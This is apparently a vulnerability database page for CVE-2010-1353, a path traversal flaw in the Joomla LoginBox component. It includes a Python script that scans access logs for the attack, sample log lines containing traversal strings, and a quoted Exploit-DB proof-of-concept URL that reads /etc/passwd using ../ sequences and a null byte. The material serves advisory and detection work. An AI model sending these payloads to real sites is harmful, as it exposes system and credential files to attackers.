CVE-2010-1353
Published: 2010-04-12
Priority: P3, 40, medium; CVSS 2.0: 5
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
EXPLOIT
EPSS: 19.19% (97.0th percentile)
Directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
No detection rules found.
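A log-based check for the request pattern in the description above, as an added example (not part of the original page or of any project it cites). The log lines are constructed, and the function names are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines (not real traffic) for illustration.
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Apr/2010:10:00:01 +0000] "GET /index.php?option=com_loginbox&view=../../../../etc/passwd%00 HTTP/1.1" 200 1532',
    '203.0.113.5 - - [05/Apr/2010:10:00:04 +0000] "GET /index.php?option=com_loginbox&view=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1532',
    '198.51.100.7 - - [05/Apr/2010:10:01:12 +0000] "GET /index.php?option=com_loginbox&view=login HTTP/1.1" 200 4011',
    '198.51.100.9 - - [05/Apr/2010:10:02:30 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 9120',
]

REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_loginbox_traversal(line):
    """True if the request targets com_loginbox with '..' or NUL in view."""
    match = REQUEST_RE.search(line)
    if not match:
        return False
    params = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
    if not any(o.lower() == "com_loginbox" for o in params.get("option", [])):
        return False
    for view in params.get("view", []):
        # parse_qs decoded once; decode further and unify path separators.
        path = fully_decode(view).replace("\\", "/")
        if "\x00" in path or ".." in path.split("/"):
            return True
    return False

def scan(lines):
    """Return the log lines that match the CVE-2010-1353 request pattern."""
    return [line for line in lines if is_loginbox_traversal(line)]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("ALERT", hit)
```

Access logs only record parameters sent in the URL, so a request that carries `view` in a POST body has to be inspected at the WAF or application layer instead.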
Exploit-DB
Joomla! Component LoginBox - Local File Inclusion
exploitdb·2010-04-05
---
Title : Joomla Component com_loginbox LFI Vulnerability
Date : Monday, 05 April 2010 (Indonesia)
Author : Vrs-hCk
Contact : ander[at]antisecurity.org
Blog : http://c0li.blogspot.com/
[+] Exploit
http://[site]/[path]/index.php?option=com_loginbox&view=[LFI]
[+] PoC
http://localhost/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00
Greetz :
www.MainHack.net - www.ServerIsDown.org - www.AntiSecurity.org
Paman, NoGe, OoN_Boy, pizzyroot, zxvf, matthews, Genex, s4va, stardustmemory,
wishnusakti, bl4Ck_3n91n3, H312Y, S3T4N, xr00tb0y, str0ke, dkk.
# c0li.m0de.0n
Nuclei
Joomla! Component LoginBox - Local File Inclusion
nuclei·CVSS 5.0
A directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
Template:
id: CVE-2010-1353
info:
  name: Joomla! Component LoginBox - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
  remediation: |
    Apply the latest security patches or updates provided by Joomla! to fix the LFI vulnerability
References:
http://packetstormsecurity.org/1004-exploits/joomlaloginbox-lfi.txt
http://secunia.com/advisories/39349
http://www.exploit-db.com/exploits/12068
http://www.securityfocus.com/bid/39212
http://www.vupen.com/english/advisories/2010/0808
https://exchange.xforce.ibmcloud.com/vulnerabilities/57533
Published: 2010-04-12